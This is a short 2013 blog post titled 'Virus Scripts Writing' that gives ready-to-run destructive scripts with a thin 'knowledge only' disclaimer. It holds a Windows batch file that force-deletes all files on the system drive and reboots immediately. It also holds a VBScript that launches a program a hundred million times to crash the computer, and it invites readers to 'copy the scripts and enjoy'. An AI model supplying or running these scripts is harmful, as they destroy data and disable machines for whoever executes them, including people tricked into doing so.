Sunday 18 August 2013

Virus Scripts Writing

I am not responsible for any damage or error reporting in Your pc do it as ur own risk. These coding only for knowledge concept .
Open Notepad.....
copy the scripts and enjoy!!! 


>>This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00


Save The Above Code a .bat file



>> This Will Crash Ur Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")



Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As Anything.vbs

It Only Works With Windows XP
 










0 comments :

Post a Comment